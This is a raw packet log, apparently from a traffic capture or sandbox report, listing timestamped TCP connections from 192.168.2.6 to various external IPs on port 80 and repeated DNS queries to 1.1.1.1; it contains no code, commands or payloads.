Jul 25, 2024 15:15:18.189291000 CEST	49733	80	192.168.2.6	170.39.226.155
Jul 25, 2024 15:15:22.129865885 CEST	49754	80	192.168.2.6	208.100.26.245
Jul 25, 2024 15:15:22.134931087 CEST	80	49754	208.100.26.245	192.168.2.6
Jul 25, 2024 15:15:22.135050058 CEST	49754	80	192.168.2.6	208.100.26.245
Jul 25, 2024 15:15:22.135179043 CEST	49754	80	192.168.2.6	208.100.26.245
Jul 25, 2024 15:15:22.141678095 CEST	80	49754	208.100.26.245	192.168.2.6
Jul 25, 2024 15:15:22.630103111 CEST	80	49754	208.100.26.245	192.168.2.6
Jul 25, 2024 15:15:22.630192041 CEST	49754	80	192.168.2.6	208.100.26.245
Jul 25, 2024 15:15:27.866867065 CEST	49755	80	192.168.2.6	44.213.104.86
Jul 25, 2024 15:15:27.873210907 CEST	80	49755	44.213.104.86	192.168.2.6
Jul 25, 2024 15:15:27.873302937 CEST	49755	80	192.168.2.6	44.213.104.86
Jul 25, 2024 15:15:27.873435020 CEST	49755	80	192.168.2.6	44.213.104.86
Jul 25, 2024 15:15:27.880100012 CEST	80	49755	44.213.104.86	192.168.2.6
Jul 25, 2024 15:15:28.415024996 CEST	80	49755	44.213.104.86	192.168.2.6
Jul 25, 2024 15:15:28.415045023 CEST	80	49755	44.213.104.86	192.168.2.6
Jul 25, 2024 15:15:28.415157080 CEST	49755	80	192.168.2.6	44.213.104.86
Jul 25, 2024 15:15:29.423971891 CEST	49755	80	192.168.2.6	44.213.104.86
Jul 25, 2024 15:15:29.430203915 CEST	80	49755	44.213.104.86	192.168.2.6
Jul 25, 2024 15:15:32.735729933 CEST	49756	80	192.168.2.6	44.221.84.105
Jul 25, 2024 15:15:32.736521959 CEST	49754	80	192.168.2.6	208.100.26.245
Jul 25, 2024 15:15:32.782696962 CEST	80	49756	44.221.84.105	192.168.2.6
Jul 25, 2024 15:15:32.782819986 CEST	49756	80	192.168.2.6	44.221.84.105
Jul 25, 2024 15:15:32.783184052 CEST	49756	80	192.168.2.6	44.221.84.105
Jul 25, 2024 15:15:32.791361094 CEST	80	49754	208.100.26.245	192.168.2.6
Jul 25, 2024 15:15:32.791608095 CEST	49754	80	192.168.2.6	208.100.26.245
Jul 25, 2024 15:15:32.815059900 CEST	80	49756	44.221.84.105	192.168.2.6
Jul 25, 2024 15:15:33.325500965 CEST	80	49756	44.221.84.105	192.168.2.6
Jul 25, 2024 15:15:33.325592995 CEST	49756	80	192.168.2.6	44.221.84.105
Jul 25, 2024 15:15:33.325607061 CEST	80	49756	44.221.84.105	192.168.2.6
Jul 25, 2024 15:15:33.325701952 CEST	49756	80	192.168.2.6	44.221.84.105
Jul 25, 2024 15:15:34.330142975 CEST	49756	80	192.168.2.6	44.221.84.105
Jul 25, 2024 15:15:34.336720943 CEST	80	49756	44.221.84.105	192.168.2.6
Jul 25, 2024 15:15:43.971405983 CEST	49759	80	192.168.2.6	13.251.16.150
Jul 25, 2024 15:15:43.978975058 CEST	80	49759	13.251.16.150	192.168.2.6
Jul 25, 2024 15:15:43.979091883 CEST	49759	80	192.168.2.6	13.251.16.150
Jul 25, 2024 15:15:43.979273081 CEST	49759	80	192.168.2.6	13.251.16.150
Jul 25, 2024 15:15:43.984551907 CEST	80	49759	13.251.16.150	192.168.2.6
Jul 25, 2024 15:15:45.377959013 CEST	80	49759	13.251.16.150	192.168.2.6
Jul 25, 2024 15:15:45.377980947 CEST	80	49759	13.251.16.150	192.168.2.6
Jul 25, 2024 15:15:45.378020048 CEST	49759	80	192.168.2.6	13.251.16.150
Jul 25, 2024 15:15:45.378057003 CEST	49759	80	192.168.2.6	13.251.16.150
Jul 25, 2024 15:15:46.392570972 CEST	49759	80	192.168.2.6	13.251.16.150
Jul 25, 2024 15:15:46.397489071 CEST	80	49759	13.251.16.150	192.168.2.6
Jul 25, 2024 15:15:46.675147057 CEST	49760	80	192.168.2.6	185.215.113.66
Jul 25, 2024 15:15:46.680124044 CEST	80	49760	185.215.113.66	192.168.2.6
Jul 25, 2024 15:15:46.680269003 CEST	49760	80	192.168.2.6	185.215.113.66
Jul 25, 2024 15:15:46.680414915 CEST	49760	80	192.168.2.6	185.215.113.66
Jul 25, 2024 15:15:46.685251951 CEST	80	49760	185.215.113.66	192.168.2.6
Jul 25, 2024 15:15:47.481281042 CEST	80	49760	185.215.113.66	192.168.2.6
Jul 25, 2024 15:15:47.481369019 CEST	49760	80	192.168.2.6	185.215.113.66
Jul 25, 2024 15:15:58.223592043 CEST	49761	80	192.168.2.6	18.141.10.107
Jul 25, 2024 15:15:58.230635881 CEST	80	49761	18.141.10.107	192.168.2.6
Jul 25, 2024 15:15:58.230904102 CEST	49761	80	192.168.2.6	18.141.10.107
Jul 25, 2024 15:15:58.230988979 CEST	49761	80	192.168.2.6	18.141.10.107
Jul 25, 2024 15:15:58.235878944 CEST	80	49761	18.141.10.107	192.168.2.6
Jul 25, 2024 15:15:59.589257002 CEST	80	49761	18.141.10.107	192.168.2.6
Jul 25, 2024 15:15:59.589299917 CEST	80	49761	18.141.10.107	192.168.2.6
Jul 25, 2024 15:15:59.589423895 CEST	49761	80	192.168.2.6	18.141.10.107
Jul 25, 2024 15:15:59.589462996 CEST	49761	80	192.168.2.6	18.141.10.107
Jul 25, 2024 15:16:00.601222992 CEST	49761	80	192.168.2.6	18.141.10.107
Jul 25, 2024 15:16:00.606807947 CEST	80	49761	18.141.10.107	192.168.2.6
Jul 25, 2024 15:16:02.073951006 CEST	49762	80	192.168.2.6	44.213.104.86
Jul 25, 2024 15:16:02.079067945 CEST	80	49762	44.213.104.86	192.168.2.6
Jul 25, 2024 15:16:02.079140902 CEST	49762	80	192.168.2.6	44.213.104.86
Jul 25, 2024 15:16:02.079317093 CEST	49762	80	192.168.2.6	44.213.104.86
Jul 25, 2024 15:16:02.084923029 CEST	80	49762	44.213.104.86	192.168.2.6
Jul 25, 2024 15:16:02.560853004 CEST	80	49762	44.213.104.86	192.168.2.6
Jul 25, 2024 15:16:02.561155081 CEST	80	49762	44.213.104.86	192.168.2.6
Jul 25, 2024 15:16:02.561285973 CEST	49762	80	192.168.2.6	44.213.104.86
Jul 25, 2024 15:16:03.564405918 CEST	49762	80	192.168.2.6	44.213.104.86
Jul 25, 2024 15:16:03.569322109 CEST	80	49762	44.213.104.86	192.168.2.6
Jul 25, 2024 15:16:03.873586893 CEST	49763	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:03.878396034 CEST	80	49763	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:03.882230043 CEST	49763	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:03.882386923 CEST	49763	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:03.887497902 CEST	80	49763	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:04.593945980 CEST	80	49763	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:04.594111919 CEST	49763	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:04.594152927 CEST	80	49763	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:04.594238997 CEST	49763	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:05.595659971 CEST	49763	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:05.600620985 CEST	80	49763	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:09.703855038 CEST	49764	80	192.168.2.6	34.218.204.173
Jul 25, 2024 15:16:09.708695889 CEST	80	49764	34.218.204.173	192.168.2.6
Jul 25, 2024 15:16:09.708782911 CEST	49764	80	192.168.2.6	34.218.204.173
Jul 25, 2024 15:16:09.708934069 CEST	49764	80	192.168.2.6	34.218.204.173
Jul 25, 2024 15:16:09.713700056 CEST	80	49764	34.218.204.173	192.168.2.6
Jul 25, 2024 15:16:10.421859026 CEST	80	49764	34.218.204.173	192.168.2.6
Jul 25, 2024 15:16:10.422225952 CEST	80	49764	34.218.204.173	192.168.2.6
Jul 25, 2024 15:16:10.422240973 CEST	49764	80	192.168.2.6	34.218.204.173
Jul 25, 2024 15:16:10.422391891 CEST	49764	80	192.168.2.6	34.218.204.173
Jul 25, 2024 15:16:11.423844099 CEST	49764	80	192.168.2.6	34.218.204.173
Jul 25, 2024 15:16:11.428877115 CEST	80	49764	34.218.204.173	192.168.2.6
Jul 25, 2024 15:16:12.851516008 CEST	49766	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:12.861829042 CEST	80	49766	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:12.861943007 CEST	49766	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:12.862078905 CEST	49766	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:12.869107008 CEST	80	49766	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:13.643528938 CEST	80	49766	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:13.643692017 CEST	80	49766	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:13.644027948 CEST	49766	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:14.658166885 CEST	49766	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:14.663346052 CEST	80	49766	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:17.472385883 CEST	80	49760	185.215.113.66	192.168.2.6
Jul 25, 2024 15:16:17.475244999 CEST	49760	80	192.168.2.6	185.215.113.66
Jul 25, 2024 15:16:20.974704981 CEST	49767	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:20.979602098 CEST	80	49767	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:20.979798079 CEST	49767	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:20.979919910 CEST	49767	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:20.984827042 CEST	80	49767	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:22.126832962 CEST	80	49767	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:22.126954079 CEST	49767	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:22.127032995 CEST	80	49767	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:22.127075911 CEST	49767	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:22.128233910 CEST	80	49767	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:22.128268957 CEST	49767	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:22.129607916 CEST	80	49767	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:22.129666090 CEST	49767	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:23.142750978 CEST	49767	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:23.147826910 CEST	80	49767	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:29.668469906 CEST	49769	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:29.673903942 CEST	80	49769	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:29.674693108 CEST	49769	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:29.674860954 CEST	49769	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:29.680543900 CEST	80	49769	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:30.553319931 CEST	80	49769	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:30.553397894 CEST	49769	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:30.553441048 CEST	80	49769	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:30.553517103 CEST	49769	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:31.565337896 CEST	49769	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:16:31.575417995 CEST	80	49769	54.244.188.177	192.168.2.6
Jul 25, 2024 15:16:36.357040882 CEST	49770	80	192.168.2.6	74.119.239.234
Jul 25, 2024 15:16:36.375930071 CEST	80	49770	74.119.239.234	192.168.2.6
Jul 25, 2024 15:16:36.376116991 CEST	49770	80	192.168.2.6	74.119.239.234
Jul 25, 2024 15:16:36.376218081 CEST	49770	80	192.168.2.6	74.119.239.234
Jul 25, 2024 15:16:36.391432047 CEST	80	49770	74.119.239.234	192.168.2.6
Jul 25, 2024 15:16:57.852740049 CEST	80	49770	74.119.239.234	192.168.2.6
Jul 25, 2024 15:16:57.852843046 CEST	49770	80	192.168.2.6	74.119.239.234
Jul 25, 2024 15:16:57.852893114 CEST	49770	80	192.168.2.6	74.119.239.234
Jul 25, 2024 15:16:57.860502958 CEST	80	49770	74.119.239.234	192.168.2.6
Jul 25, 2024 15:17:04.485295057 CEST	49771	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:04.490923882 CEST	80	49771	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:04.491015911 CEST	49771	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:04.491183043 CEST	49771	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:04.496149063 CEST	80	49771	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:05.252253056 CEST	80	49771	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:05.252309084 CEST	49771	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:05.255053043 CEST	80	49771	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:05.255150080 CEST	49771	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:06.267601013 CEST	49771	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:06.367876053 CEST	80	49771	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:09.052252054 CEST	49772	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:09.057208061 CEST	80	49772	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:09.057277918 CEST	49772	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:09.057415962 CEST	49772	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:09.064940929 CEST	80	49772	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:09.953108072 CEST	80	49772	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:09.954080105 CEST	80	49772	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:09.954226017 CEST	49772	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:10.970735073 CEST	49772	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:10.980952978 CEST	80	49772	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:14.848233938 CEST	49773	80	192.168.2.6	34.218.204.173
Jul 25, 2024 15:17:15.055406094 CEST	80	49773	34.218.204.173	192.168.2.6
Jul 25, 2024 15:17:15.055591106 CEST	49773	80	192.168.2.6	34.218.204.173
Jul 25, 2024 15:17:15.055804968 CEST	49773	80	192.168.2.6	34.218.204.173
Jul 25, 2024 15:17:15.062446117 CEST	80	49773	34.218.204.173	192.168.2.6
Jul 25, 2024 15:17:15.810820103 CEST	80	49773	34.218.204.173	192.168.2.6
Jul 25, 2024 15:17:15.810859919 CEST	80	49773	34.218.204.173	192.168.2.6
Jul 25, 2024 15:17:15.810889959 CEST	49773	80	192.168.2.6	34.218.204.173
Jul 25, 2024 15:17:15.810925007 CEST	49773	80	192.168.2.6	34.218.204.173
Jul 25, 2024 15:17:16.815237999 CEST	49773	80	192.168.2.6	34.218.204.173
Jul 25, 2024 15:17:16.820272923 CEST	80	49773	34.218.204.173	192.168.2.6
Jul 25, 2024 15:17:18.067245960 CEST	49774	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:18.072341919 CEST	80	49774	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:18.072509050 CEST	49774	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:18.072652102 CEST	49774	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:18.077513933 CEST	80	49774	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:18.813992977 CEST	80	49774	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:18.814126968 CEST	80	49774	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:18.814182043 CEST	49774	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:18.815063000 CEST	49774	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:19.830090046 CEST	49774	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:19.834983110 CEST	80	49774	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:25.693257093 CEST	49775	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:25.699414015 CEST	80	49775	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:25.699481010 CEST	49775	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:25.699661016 CEST	49775	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:25.705101013 CEST	80	49775	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:26.514657974 CEST	80	49775	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:26.514722109 CEST	49775	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:26.523116112 CEST	80	49775	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:26.523196936 CEST	49775	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:26.529818058 CEST	80	49775	54.244.188.177	192.168.2.6
Jul 25, 2024 15:17:26.529865980 CEST	49775	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:28.423892021 CEST	49775	80	192.168.2.6	54.244.188.177
Jul 25, 2024 15:17:28.696512938 CEST	80	49775	54.244.188.177	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 15:13:19.352777958 CEST	61964	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:13:19.451169968 CEST	53	61964	1.1.1.1	192.168.2.6
Jul 25, 2024 15:13:40.199372053 CEST	65031	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:13:41.218578100 CEST	65031	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:13:41.555955887 CEST	53	65031	1.1.1.1	192.168.2.6
Jul 25, 2024 15:13:41.556565046 CEST	53	65031	1.1.1.1	192.168.2.6
Jul 25, 2024 15:13:42.547554970 CEST	50120	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:13:42.754754066 CEST	53	50120	1.1.1.1	192.168.2.6
Jul 25, 2024 15:14:06.944644928 CEST	57042	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:14:07.002186060 CEST	53	57042	1.1.1.1	192.168.2.6
Jul 25, 2024 15:14:29.647766113 CEST	50708	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:14:30.005697012 CEST	53	50708	1.1.1.1	192.168.2.6
Jul 25, 2024 15:14:39.145549059 CEST	57702	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:14:39.196909904 CEST	53	57702	1.1.1.1	192.168.2.6
Jul 25, 2024 15:14:40.316734076 CEST	61954	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:14:40.575145960 CEST	53	61954	1.1.1.1	192.168.2.6
Jul 25, 2024 15:14:41.801616907 CEST	60246	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:14:41.853352070 CEST	53	60246	1.1.1.1	192.168.2.6
Jul 25, 2024 15:14:42.973072052 CEST	56573	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:14:43.075299025 CEST	53	56573	1.1.1.1	192.168.2.6
Jul 25, 2024 15:14:44.191970110 CEST	55353	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:14:44.449604034 CEST	53	55353	1.1.1.1	192.168.2.6
Jul 25, 2024 15:14:45.584778070 CEST	65446	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:14:45.855427027 CEST	53	65446	1.1.1.1	192.168.2.6
Jul 25, 2024 15:14:46.973747969 CEST	59304	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:14:47.028892040 CEST	53	59304	1.1.1.1	192.168.2.6
Jul 25, 2024 15:14:48.161391020 CEST	51311	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:14:48.610685110 CEST	53	51311	1.1.1.1	192.168.2.6
Jul 25, 2024 15:14:50.240822077 CEST	65488	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:14:50.328067064 CEST	53	65488	1.1.1.1	192.168.2.6
Jul 25, 2024 15:14:51.443193913 CEST	54658	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:14:51.529253960 CEST	53	54658	1.1.1.1	192.168.2.6
Jul 25, 2024 15:14:52.646769047 CEST	53247	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:14:52.697886944 CEST	53	53247	1.1.1.1	192.168.2.6
Jul 25, 2024 15:14:53.818129063 CEST	54151	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:14:53.908288956 CEST	53	54151	1.1.1.1	192.168.2.6
Jul 25, 2024 15:14:55.036415100 CEST	59246	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:14:55.234798908 CEST	53	59246	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:00.365200996 CEST	49399	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:00.414899111 CEST	53	49399	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:01.536808968 CEST	59073	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:01.625380993 CEST	53	59073	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:02.739101887 CEST	58802	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:02.889776945 CEST	53	58802	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:04.004798889 CEST	60596	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:04.096728086 CEST	53	60596	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:05.223871946 CEST	53491	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:05.274229050 CEST	53	53491	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:06.395818949 CEST	57168	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:06.450229883 CEST	53	57168	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:07.569322109 CEST	50911	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:07.652426004 CEST	53	50911	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:08.770872116 CEST	56974	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:09.405515909 CEST	53	56974	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:14.560338974 CEST	62937	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:14.613394022 CEST	53	62937	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:15.741241932 CEST	50424	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:15.823622942 CEST	53	50424	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:16.946208954 CEST	65348	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:17.031714916 CEST	53	65348	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:18.145437956 CEST	56918	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:18.194735050 CEST	53	56918	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:19.317435980 CEST	57561	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:19.404558897 CEST	53	57561	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:20.541022062 CEST	50912	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:20.624769926 CEST	53	50912	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:21.886759996 CEST	56030	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:22.121957064 CEST	53	56030	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:23.755763054 CEST	64485	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:23.766561031 CEST	53	64485	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:24.896142960 CEST	57241	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:25.408566952 CEST	53	57241	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:26.551851034 CEST	54464	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:26.563381910 CEST	53	54464	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:27.680366993 CEST	63228	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:27.866024971 CEST	53	63228	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:29.536102057 CEST	61110	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:29.547326088 CEST	53	61110	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:30.726440907 CEST	59104	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:30.849684000 CEST	53	59104	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:32.000504971 CEST	61197	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:32.734591961 CEST	53	61197	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:34.444164991 CEST	57598	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:34.453625917 CEST	53	57598	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:35.584157944 CEST	61508	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:35.817830086 CEST	53	61508	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:36.942497969 CEST	59313	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:36.952613115 CEST	53	59313	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:38.067801952 CEST	49811	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:38.077578068 CEST	53	49811	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:39.200510025 CEST	62191	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:39.219974041 CEST	53	62191	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:40.348548889 CEST	58804	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:40.361435890 CEST	53	58804	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:41.490008116 CEST	64688	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:41.502330065 CEST	53	64688	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:42.629760981 CEST	59305	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:42.643661022 CEST	53	59305	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:43.770972967 CEST	60490	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:43.970180988 CEST	53	60490	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:46.504739046 CEST	49257	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:46.673913002 CEST	53	49257	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:48.599304914 CEST	51202	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:48.614532948 CEST	53	51202	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:49.740118980 CEST	49623	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:49.752501011 CEST	53	49623	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:50.879848957 CEST	57566	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:50.916500092 CEST	53	57566	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:52.036026001 CEST	53643	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:52.047518969 CEST	53	53643	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:53.162728071 CEST	64964	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:53.175554991 CEST	53	64964	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:54.301779985 CEST	56912	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:54.312077999 CEST	53	56912	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:55.428741932 CEST	51236	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:55.440915108 CEST	53	51236	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:56.601383924 CEST	53216	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:56.911587000 CEST	53216	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:56.912908077 CEST	53	53216	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:56.922616005 CEST	53	53216	1.1.1.1	192.168.2.6
Jul 25, 2024 15:15:58.035763025 CEST	49648	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:15:58.222551107 CEST	53	49648	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:00.741215944 CEST	52926	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:00.752420902 CEST	53	52926	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:01.880450964 CEST	65112	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:02.071814060 CEST	53	65112	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:03.676770926 CEST	53163	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:03.870702982 CEST	53	53163	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:05.708499908 CEST	56938	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:05.717729092 CEST	53	56938	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:06.833108902 CEST	52188	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:06.920284986 CEST	53	52188	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:08.036030054 CEST	57205	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:08.047108889 CEST	53	57205	1.1.1.1	192.168.2.6
Jul 25, 2024 15:16:09.161227942 CEST	51042	53	192.168.2.6	1.1.1.1
Jul 25, 2024 15:16:09.470685005 CEST	51042	53	192.168.2.6	1.1.1.1
